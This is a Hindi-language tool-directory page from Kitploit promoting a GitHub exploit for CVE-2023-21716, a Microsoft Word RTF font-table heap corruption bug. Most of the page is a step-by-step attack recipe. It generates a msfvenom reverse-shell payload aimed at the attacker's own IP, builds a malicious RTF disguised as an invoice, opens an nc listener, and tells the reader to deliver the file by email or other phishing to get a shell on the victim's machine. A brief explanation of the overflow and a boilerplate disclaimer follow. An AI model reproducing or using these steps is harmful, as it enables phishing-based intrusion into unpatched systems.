Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-21716 — CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload | Kitploit
उपकरण/GitHubGitHub/reggyraider/cve-2023-21716
Phishing ToolsPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubreggyraider/cve-2023-21716

CVE-2023-21716

CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-21716 — Microsoft Word RTF fonttbl Heap Corruption RCE

गंभीरता: क्रिटिकल (CVSS 9.8)
प्रभावित: Microsoft Word 2013 / 2016 / 2019 / 2021 (अनपैच्ड)
पैच: Microsoft फरवरी 2023 पैच ट्यूज़डे
लेखक: REGGYRAIDER


भेद्यता अवलोकन

CVE-2023-21716 माइक्रोसॉफ्ट वर्ड के RTF पार्सर (wwlib.dll) में एक हीप करप्शन भेद्यता है।
जब वर्ड एक \fonttbl निर्देश को पार्स करता है जिसमें 32,767 से अधिक फ़ॉन्ट प्रविष्टियाँ होती हैं, तो एक आंतरिक साइन्ड 16-बिट काउंटर ओवरफ़्लो हो जाता है, जिससे हीप मेटाडेटा दूषित हो जाता है। यह एक हमलावर को केवल पीड़ित को एक क्राफ्टेड .rtf फ़ाइल भेजकर रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है।

कोई मैक्रो नहीं। फ़ाइल खोलने के अलावा कोई उपयोगकर्ता इंटरैक्शन नहीं।


सेटअप और एक्सप्लॉइट

चरण 1 — msfvenom के साथ रॉ शेलकोड जनरेट करें

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin

चरण 2 — इस रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716

चरण 3 — दुर्भावनापूर्ण RTF बनाएँ

root@kitploit:~
python3 exploit.py payload.bin invoice_march2024.rtf

चरण 4 — अपना लिसनर शुरू करें

root@kitploit:~
nc -lvnp 4444

चरण 5 — फ़ाइल वितरित करें

SMB, ईमेल अटैचमेंट, या किसी भी फ़िशिंग वेक्टर के माध्यम से अपलोड करें।
जब पीड़ित एक अनपैच्ड वर्ड में invoice_march2024.rtf खोलता है, तो आपको एक रिवर्स शेल प्राप्त होता है।


यह कैसे काम करता है

root@kitploit:~
Attacker creates RTF          Word parses \fonttbl        Heap corrupted
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl with 32769+         Signed 16-bit counter        Attacker's
font definitions             overflows → 0x8000           shellcode runs
  1. एक्सप्लॉइट \fonttbl के अंदर 32,769 \f<N> फ़ॉन्ट परिभाषाएँ एम्बेड करता है।
  2. वर्ड (अब ओवरफ़्लो हो चुके) काउंटर के आधार पर एक निश्चित आकार का बफर आवंटित करता है।
  3. बाद के फ़ॉन्ट राइट्स आवंटित बफर से आगे चले जाते हैं, आसन्न हीप चंक्स को दूषित करते हुए।
  4. रॉ शेलकोड (payload.bin से) \pict के अंदर रखा जाता है और दूषित क्षेत्र में उतरता है, जब आवंटक इसे संसाधित करता है तो निष्पादन प्राप्त करता है।

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए अभिप्रेत है।
इस एक्सप्लॉइट का उपयोग उन प्रणालियों के विरुद्ध करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है।
लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।


संदर्भ

  • माइक्रोसॉफ्ट सुरक्षा सलाह
  • NVD प्रविष्टि
टूल डाउनलोड करें